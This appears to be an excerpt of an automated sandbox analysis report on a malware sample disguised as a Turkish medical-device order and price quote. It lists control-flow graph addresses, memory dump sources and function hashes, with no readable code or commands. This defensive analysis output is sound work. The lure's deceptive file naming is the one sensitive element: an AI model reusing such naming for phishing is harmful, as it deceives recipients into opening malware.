                                                                                                  control_flow_graph 1952 29a5f38-29a5f5a 1953 29a5f5c-29a5f60 1952->1953 1954 29a5f70-29a5f7b 1952->1954 1955 29a5f88-29a5f8f 1953->1955 1956 29a5f62-29a5f6e 1953->1956 1957 29a6023-29a604f 1954->1957 1958 29a5f81-29a5f83 1954->1958 1960 29a5faf-29a5fb8 1955->1960 1961 29a5f91-29a5f98 1955->1961 1956->1954 1956->1955 1965 29a6056-29a6098 1957->1965 1959 29a601b-29a6020 1958->1959 2038 29a5fba call 29a5f2a 1960->2038 2039 29a5fba call 29a5f38 1960->2039 1961->1960 1962 29a5f9a-29a5fa5 1961->1962 1964 29a5fab-29a5fad 1962->1964 1962->1965 1964->1959 1984 29a609a-29a60ae 1965->1984 1985 29a60cb-29a60cf 1965->1985 1966 29a5fc0-29a5fc2 1967 29a5fca-29a5fd2 1966->1967 1968 29a5fc4-29a5fc8 1966->1968 1971 29a5fe1-29a5fe3 1967->1971 1972 29a5fd4-29a5fd9 1967->1972 1968->1967 1970 29a5fe5-29a5ff6 1968->1970 2040 29a5ff9 call 29a69b0 1970->2040 2041 29a5ff9 call 29a69a0 1970->2041 1971->1959 1972->1971 1975 29a5fff-29a6004 1978 29a6019 1975->1978 1979 29a6006-29a600f 1975->1979 1978->1959 2034 29a6011 call 29aaeba 1979->2034 2035 29a6011 call 29aafad 1979->2035 2036 29a6011 call 29aaef0 1979->2036 2037 29a6011 call 29aaf00 1979->2037 1981 29a6017 1981->1959 1986 29a60bd-29a60c1 1984->1986 1987 29a60b0-29a60b6 1984->1987 1988 29a6163-29a6165 1985->1988 1989 29a60d1-29a60d9 1985->1989 1986->1985 1987->1986 2032 29a6167 call 29a62f0 1988->2032 2033 29a6167 call 29a6300 1988->2033 1990 29a60db-29a60e7 1989->1990 1991 29a60e9-29a60f6 1989->1991 1999 29a60f8-29a6102 1990->1999 1991->1999 1992 29a616d-29a6173 1993 29a617f-29a6186 1992->1993 1994 29a6175-29a617b 1992->1994 1997 29a617d 1994->1997 1998 29a61e1-29a6240 1994->1998 1997->1993 2015 29a6247-29a625b 1998->2015 2002 29a612f-29a6133 1999->2002 2003 29a6104-29a6113 1999->2003 2004 29a613f-29a6143 2002->2004 2005 29a6135-29a613b 2002->2005 2012 29a6123-29a612d 2003->2012 2013 29a6115-29a611c 2003->2013 2004->1993 2010 29a6145-29a6149 2004->2010 2008 29a6189-29a61da 2005->2008 2009 29a613d 2005->2009 2008->1998 2009->1993 2014 29a614f-29a6161 2010->2014 2010->2015 2012->2002 2013->2012 2014->1993 2032->1992 2033->1992 2034->1981 2035->1981 2036->1981 2037->1981 2038->1966 2039->1966 2040->1975 2041->1975
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.3759058822.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_29a0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: Hq$Hq
                                                                                                  • API String ID: 0-925789375
                                                                                                  • Opcode ID: 544bb40a1b0198d513195f806b225f760abac7ad9fcc8f325d7777dbdc48cff6
                                                                                                  • Instruction ID: 07b827b1ef6c2fa13f4d9eff4ba0ef3a63433b3b6795f55a081ab13f2ac17d28
                                                                                                  • Opcode Fuzzy Hash: 544bb40a1b0198d513195f806b225f760abac7ad9fcc8f325d7777dbdc48cff6
                                                                                                  • Instruction Fuzzy Hash: 0191AE307043158FEB159F25D869B6E7BBAEF89304F188469E4468B395DF388C42CBD1
                                                                                                  Function 029A6498 Relevance: 2.7, Strings: 2, Instructions: 229COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 2042 29a6498-29a64a5 2043 29a64ad-29a64af 2042->2043 2044 29a64a7-29a64ab 2042->2044 2046 29a66c0-29a66c7 2043->2046 2044->2043 2045 29a64b4-29a64bf 2044->2045 2047 29a66c8 2045->2047 2048 29a64c5-29a64cc 2045->2048 2051 29a66cd-29a66e0 2047->2051 2049 29a64d2-29a64e1 2048->2049 2050 29a6661-29a6667 2048->2050 2049->2051 2052 29a64e7-29a64f6 2049->2052 2053 29a6669-29a666b 2050->2053 2054 29a666d-29a6671 2050->2054 2061 29a6718-29a671a 2051->2061 2062 29a66e2-29a6705 2051->2062 2063 29a650b-29a650e 2052->2063 2064 29a64f8-29a64fb 2052->2064 2053->2046 2055 29a66be 2054->2055 2056 29a6673-29a6679 2054->2056 2055->2046 2056->2047 2057 29a667b-29a667e 2056->2057 2057->2047 2060 29a6680-29a6695 2057->2060 2081 29a66b9-29a66bc 2060->2081 2082 29a6697-29a669d 2060->2082 2068 29a672f-29a6736 2061->2068 2069 29a671c-29a672e 2061->2069 2083 29a670e-29a6712 2062->2083 2084 29a6707-29a670c 2062->2084 2065 29a651a-29a6520 2063->2065 2067 29a6510-29a6513 2063->2067 2064->2065 2066 29a64fd-29a6500 2064->2066 2076 29a6538-29a6555 2065->2076 2077 29a6522-29a6528 2065->2077 2070 29a6601-29a6607 2066->2070 2071 29a6506 2066->2071 2073 29a6566-29a656c 2067->2073 2074 29a6515 2067->2074 2088 29a6609-29a660f 2070->2088 2089 29a661f-29a6629 2070->2089 2078 29a662c-29a6639 2071->2078 2079 29a656e-29a6574 2073->2079 2080 29a6584-29a6596 2073->2080 2074->2078 2113 29a655e-29a6561 2076->2113 2085 29a652a 2077->2085 2086 29a652c-29a6536 2077->2086 2106 29a663b-29a663f 2078->2106 2107 29a664d-29a664f 2078->2107 2095 29a6578-29a6582 2079->2095 2096 29a6576 2079->2096 2108 29a6598-29a65a4 2080->2108 2109 29a65a6-29a65c9 2080->2109 2081->2046 2090 29a66af-29a66b2 2082->2090 2091 29a669f-29a66ad 2082->2091 2083->2061 2084->2061 2085->2076 2086->2076 2092 29a6613-29a661d 2088->2092 2093 29a6611 2088->2093 2089->2078 2090->2047 2099 29a66b4-29a66b7 2090->2099 2091->2047 2091->2090 2092->2089 2093->2089 2095->2080 2096->2080 2099->2081 2099->2082 2106->2107 2110 29a6641-29a6645 2106->2110 2111 29a6653-29a6656 2107->2111 2117 29a65f1-29a65ff 2108->2117 2109->2047 2119 29a65cf-29a65d2 2109->2119 2110->2047 2114 29a664b 2110->2114 2111->2047 2115 29a6658-29a665b 2111->2115 2113->2078 2114->2111 2115->2049 2115->2050 2117->2078 2119->2047 2121 29a65d8-29a65ea 2119->2121 2121->2117
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.3759058822.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_29a0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: ,q$,q
                                                                                                  • API String ID: 0-1667412543
                                                                                                  • Opcode ID: d29715f8815c70a3335b4ba0b564dee3881122d5f81131fce0f07e8ca635fe42
                                                                                                  • Instruction ID: 319902cc5f34d153ef27fb436b1d1d35b708a23ede10c9867c96f3943bfd97b8
                                                                                                  • Opcode Fuzzy Hash: d29715f8815c70a3335b4ba0b564dee3881122d5f81131fce0f07e8ca635fe42
                                                                                                  • Instruction Fuzzy Hash: 86817D34A006058FCF54CF6DC4A8AA9BBBAFF89714B198169D505DB364DB31E841CBA1
                                                                                                  Function 029A3CC0 Relevance: 2.6, Strings: 2, Instructions: 112COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.3759058822.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_29a0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: Xq$Xq
                                                                                                  • API String ID: 0-1556399337
                                                                                                  • Opcode ID: c314bef0ef8b7e4ce5ca8d0b71747e5509f837c316cf8d35addc95565bad2c2f
                                                                                                  • Instruction ID: 145906cb4093b0fb7ec7b15879f48b05aeccb29ddb925044ccc488dc5dbb667b
                                                                                                  • Opcode Fuzzy Hash: c314bef0ef8b7e4ce5ca8d0b71747e5509f837c316cf8d35addc95565bad2c2f
                                                                                                  • Instruction Fuzzy Hash: A731A435B00325CBDF28566A98A537E66AEAFC4214F184479F806C7380DFB4CC4586E9
                                                                                                  Function 029A8EF8 Relevance: 2.6, Strings: 2, Instructions: 99COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.3759058822.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_29a0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $q$$q
                                                                                                  • API String ID: 0-3126353813
                                                                                                  • Opcode ID: 9a2f053dfbea2f0f6966fa6f151fdf8e558ce34f3aa0f658515e26886fa31dc2
                                                                                                  • Instruction ID: e55fb58b5fd65049c106e0fb29b98e3f8bb07362c664b6e1c2a221b52b62ec89
                                                                                                  • Opcode Fuzzy Hash: 9a2f053dfbea2f0f6966fa6f151fdf8e558ce34f3aa0f658515e26886fa31dc2
                                                                                                  • Instruction Fuzzy Hash: 13316D303143538FDB259B29DCA477EBB6ABB84610B28487AF056DB292DF28DC41C7D5
                                                                                                  Function 029A0C8F Relevance: 1.8, Strings: 1, Instructions: 543COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.3759058822.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_29a0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: LRq
                                                                                                  • API String ID: 0-3187445251
                                                                                                  • Opcode ID: 79380d15d276a0ee2f48e9e9029d06e95e16aa17ddf0ed5e9b74b387a95c3288
                                                                                                  • Instruction ID: d9b4ff59856f8c200353bf35b16e225d2a366d4b5c0bf9dffe0f0f82ffc37e19
                                                                                                  • Opcode Fuzzy Hash: 79380d15d276a0ee2f48e9e9029d06e95e16aa17ddf0ed5e9b74b387a95c3288
                                                                                                  • Instruction Fuzzy Hash: EE52C878D01219CFDB54EF24E995B9DBBB2FB48301F1089A5D409AB399DB346D82CF90
                                                                                                  Function 029A0CA0 Relevance: 1.8, Strings: 1, Instructions: 539COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.3759058822.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_29a0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: LRq
                                                                                                  • API String ID: 0-3187445251
                                                                                                  • Opcode ID: 1fc400bdaa233276c7093bcc012ac0c803da19874c00dd72fe45e5014302495c
                                                                                                  • Instruction ID: 0a133db713cbc37974f15ad1a6fa967517ab45b4850761fb5ec283580c3d38d7
                                                                                                  • Opcode Fuzzy Hash: 1fc400bdaa233276c7093bcc012ac0c803da19874c00dd72fe45e5014302495c
                                                                                                  • Instruction Fuzzy Hash: 6752C878D01219CFDB54EF24E995B9DBBB2FB48301F1089A5D409AB399DB346D82CF90
                                                                                                  Function 0556992C Relevance: 1.6, APIs: 1, Instructions: 62libraryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • LdrInitializeThunk.NTDLL(00000000), ref: 05569A6E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.3765414670.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_5560000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 3481b05e8c82b3e0aa376f129e1138505e22ef5fa5bac9108eee7462b0f75138
                                                                                                  • Instruction ID: df486465bbe8afddbdb2a3de65d1cb69a1d22ef3af65026bc35916472aa327c9
                                                                                                  • Opcode Fuzzy Hash: 3481b05e8c82b3e0aa376f129e1138505e22ef5fa5bac9108eee7462b0f75138
                                                                                                  • Instruction Fuzzy Hash: 59113A78E042499FDB04DBA8D588EBDB7F5FF88314F148269E844AB256D7709941CF60
                                                                                                  Function 029AAEBA Relevance: 1.3, Strings: 1, Instructions: 50COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.3759058822.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_29a0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: (oq
                                                                                                  • API String ID: 0-1999159160
                                                                                                  • Opcode ID: 1fb40810c1edec4c63934aa934ba8907a972c562bf2799f5efc618de5dde5320
                                                                                                  • Instruction ID: a1c47afd8a51298377aef0f7c891bf912b515286714446c20e5c72187502ae39
                                                                                                  • Opcode Fuzzy Hash: 1fb40810c1edec4c63934aa934ba8907a972c562bf2799f5efc618de5dde5320
                                                                                                  • Instruction Fuzzy Hash: 0211C472710305AFCB108FA4EC66BADBBB5FB8C300F145025FA1597250DB319812CBA0
                                                                                                  Function 029AE007 Relevance: .7, Instructions: 652COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.3759058822.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_29a0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 7dc8edd956acd096851471b5ed8a4ad0df5188c4c6e1974d4416b3859035ff0d
                                                                                                  • Instruction ID: 962a07f1f0103a05932af542209099632b4fabe601669ae83234740adc8a4461
                                                                                                  • Opcode Fuzzy Hash: 7dc8edd956acd096851471b5ed8a4ad0df5188c4c6e1974d4416b3859035ff0d
                                                                                                  • Instruction Fuzzy Hash: 7812A7754356578FE6642B20E6AE17FBF68FB0F363B44BC11F11EA01419F78508A9A22
                                                                                                  Function 029AE018 Relevance: .6, Instructions: 647COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.3759058822.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_29a0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: dd17030c660d170f20ec36465f2b2d52e4d9435a56fcdaaf04ce6b3181420fc1
                                                                                                  • Instruction ID: 00aee6b79281eef6f88827bb0f531d1e1295ebe5fb5fe68b208500679924f07b
                                                                                                  • Opcode Fuzzy Hash: dd17030c660d170f20ec36465f2b2d52e4d9435a56fcdaaf04ce6b3181420fc1
                                                                                                  • Instruction Fuzzy Hash: 7912A6754356578FE6642B20E6AE17FBF68FB0F363B44BC11F11EA00419F78508A9A22
                                                                                                  Function 029A80D8 Relevance: .2, Instructions: 201COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.3759058822.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_29a0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: ab3684373ef008e1e575de54dea277d43b8ea8b1c7d60b6e3ceb5ce13eb05ea8
                                                                                                  • Instruction ID: b8a2af64a9e23470b46f1df26eca9c32a109793694a136c87f1ea3f0057758f6
                                                                                                  • Opcode Fuzzy Hash: ab3684373ef008e1e575de54dea277d43b8ea8b1c7d60b6e3ceb5ce13eb05ea8
                                                                                                  • Instruction Fuzzy Hash: 2171F5347006058FDB15DF68C8A8ABE7BEABF89344F1944A9E806DB361DB74DC41CB91
                                                                                                  Function 029AF748 Relevance: .1, Instructions: 147COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.3759058822.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_29a0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 4485e5bff91b0b71f8d1ac9931d91ae15a96d138b4f724cecdc8a834cd13dbda
                                                                                                  • Instruction ID: b1a0598dbbe083d69458cd751901a37beb9636d402392a92ed2d5e440967217b
                                                                                                  • Opcode Fuzzy Hash: 4485e5bff91b0b71f8d1ac9931d91ae15a96d138b4f724cecdc8a834cd13dbda
                                                                                                  • Instruction Fuzzy Hash: 2151E178D00318DFEB14DFA5D858BADBBB2FF88300F208129D805AB298DB755A45CF54
                                                                                                  Function 029AD548 Relevance: .1, Instructions: 139COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.3759058822.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_29a0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 2d3963251812acfb52a974e1d5118a5aabc0e93c7415628187f2adeb44d8ebb6
                                                                                                  • Instruction ID: a89c8f9f94cf1e4c2b31e3acfedc2796e925c440910cead760c2882f47527e57
                                                                                                  • Opcode Fuzzy Hash: 2d3963251812acfb52a974e1d5118a5aabc0e93c7415628187f2adeb44d8ebb6
                                                                                                  • Instruction Fuzzy Hash: 04519478E01208DFDB54DFA9D98499DBBF2FF89300F248169E819AB364DB30A941CF50
                                                                                                  Function 029A41A0 Relevance: .1, Instructions: 134COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.3759058822.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_29a0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: cba4f88fe472c07e5530af28bed2ab59346717fc2d43b5aec1ae269972603c1f
                                                                                                  • Instruction ID: fbf1816825b5321c166c8efa40c1826eff6ab6a8e3fbef38e3f5ec25c3790c57
                                                                                                  • Opcode Fuzzy Hash: cba4f88fe472c07e5530af28bed2ab59346717fc2d43b5aec1ae269972603c1f
                                                                                                  • Instruction Fuzzy Hash: 51518F75E01308CFCB08EFA9D59499DBBF6FF89310B209469E815AB364DB35A842CF50
                                                                                                  Function 029AA303 Relevance: .1, Instructions: 122COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.3759058822.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_29a0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: d058d6243f2d21048f82a1059dc68d84e80144944bf332fd163982688f098927
                                                                                                  • Instruction ID: 2ee422a4454bdf577ea9a4150b04dd90dfd913fafbc05ee343fc8b294d9e41a2
                                                                                                  • Opcode Fuzzy Hash: d058d6243f2d21048f82a1059dc68d84e80144944bf332fd163982688f098927
                                                                                                  • Instruction Fuzzy Hash: 8041AC31A00349DFDF15CFA8C858B9EBBB6AF89310F048456F909AB291D774E914CB90
                                                                                                  Function 029AAF00 Relevance: .1, Instructions: 102COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.3759058822.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_29a0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 0481c518f8f281ba02c2e31a9a0ac75e2fd5a0cf8bc5ac72884bfd4a27458ba1
                                                                                                  • Instruction ID: 9c5cdbf89e198b23ed459ba15d474bd6d2798e6c3fd872396dcd461dbe8cb6ec
                                                                                                  • Opcode Fuzzy Hash: 0481c518f8f281ba02c2e31a9a0ac75e2fd5a0cf8bc5ac72884bfd4a27458ba1
                                                                                                  • Instruction Fuzzy Hash: 5831C335B103049FDB049F64D8657AE7BB7ABC8350F144069E506D7390DE359C02CB90
                                                                                                  Function 029A5658 Relevance: .1, Instructions: 101COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.3759058822.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_29a0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 19d688be8e9972266a62c7ba87938f6028a8893638ff0f2bfce4df9a958dec24
                                                                                                  • Instruction ID: 0cdcb31aa2f27a5c8ada67ea8b2eebea6b68bd55423fc27e2fd0d7ae11e559a4
                                                                                                  • Opcode Fuzzy Hash: 19d688be8e9972266a62c7ba87938f6028a8893638ff0f2bfce4df9a958dec24
                                                                                                  • Instruction Fuzzy Hash: A6316E35700209DFCF019F68E894AAE3BB6FF88314F458464F9159B294CB39D962CBA1
                                                                                                  Function 029A8370 Relevance: .1, Instructions: 88COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.3759058822.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_29a0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: cc6cdb9c87958af92f0f34afbf991a1ef96c16d390b94db53ffd203311821e65
                                                                                                  • Instruction ID: 18d3a565f20530e123d0e607c9d3c33a93bea517a4d7acb8d0eec078d2dbf639
                                                                                                  • Opcode Fuzzy Hash: cc6cdb9c87958af92f0f34afbf991a1ef96c16d390b94db53ffd203311821e65
                                                                                                  • Instruction Fuzzy Hash: E221D0313143504BDB25172A9864B3E6BEBBFC5759B088479E80ACB699EF29CC02D3C1
                                                                                                  Function 029A8380 Relevance: .1, Instructions: 87COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.3759058822.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_29a0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 321e3e8805a2ba4cb80a5f2b2738a524c18774f4cfd7d8db1958e0e8112ebc33
                                                                                                  • Instruction ID: 4407c3aff2ed61fa732126f828a8015449475211f4b8830d6dfc63631ebdc80f
                                                                                                  • Opcode Fuzzy Hash: 321e3e8805a2ba4cb80a5f2b2738a524c18774f4cfd7d8db1958e0e8112ebc33
                                                                                                  • Instruction Fuzzy Hash: E021AC303143104BEB245A2A986473E6ADBBFC4758F148439E40ACB799EF69CC42D3D1
                                                                                                  Function 029A28F0 Relevance: .1, Instructions: 77COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.3759058822.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_29a0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: b6a797f3af1818731e542119d2b89e79f0a998aab44571d91080e921587eeb8d
                                                                                                  • Instruction ID: 102bae6cbca09e468041c485b586c49258eeacf076312edf2e7cdcc964899846
                                                                                                  • Opcode Fuzzy Hash: b6a797f3af1818731e542119d2b89e79f0a998aab44571d91080e921587eeb8d
                                                                                                  • Instruction Fuzzy Hash: EB218135E003189FCB14DF28C850BAE7BB9EBD9760B608519D9199B384DB31EA46CBD1
                                                                                                  Function 029AF739 Relevance: .1, Instructions: 75COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.3759058822.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_29a0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 6eb50cb91cef16ef4019021ff708eedc69cddf55fad1553dd9caa2dfad5acf08
                                                                                                  • Instruction ID: adcd1f204c8bd27671393141777215b8e5a32b85ed15d71240448aad78862981
                                                                                                  • Opcode Fuzzy Hash: 6eb50cb91cef16ef4019021ff708eedc69cddf55fad1553dd9caa2dfad5acf08
                                                                                                  • Instruction Fuzzy Hash: 5B311474D11318DFEB04CFA5D4647EDBBB2BF89300F508829D805BB284DBB9564ACB50
                                                                                                  Function 029A6300 Relevance: .1, Instructions: 74COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.3759058822.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_29a0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: b716708f9093b9dee82a4dde3a6500614ef5e1dbf60d79af0af9621b3ad267ba
                                                                                                  • Instruction ID: 0f581f999497c6b8dd2aa0a7fa9b68d3b43cf2f97ce78e63b94b46ca0af6029d
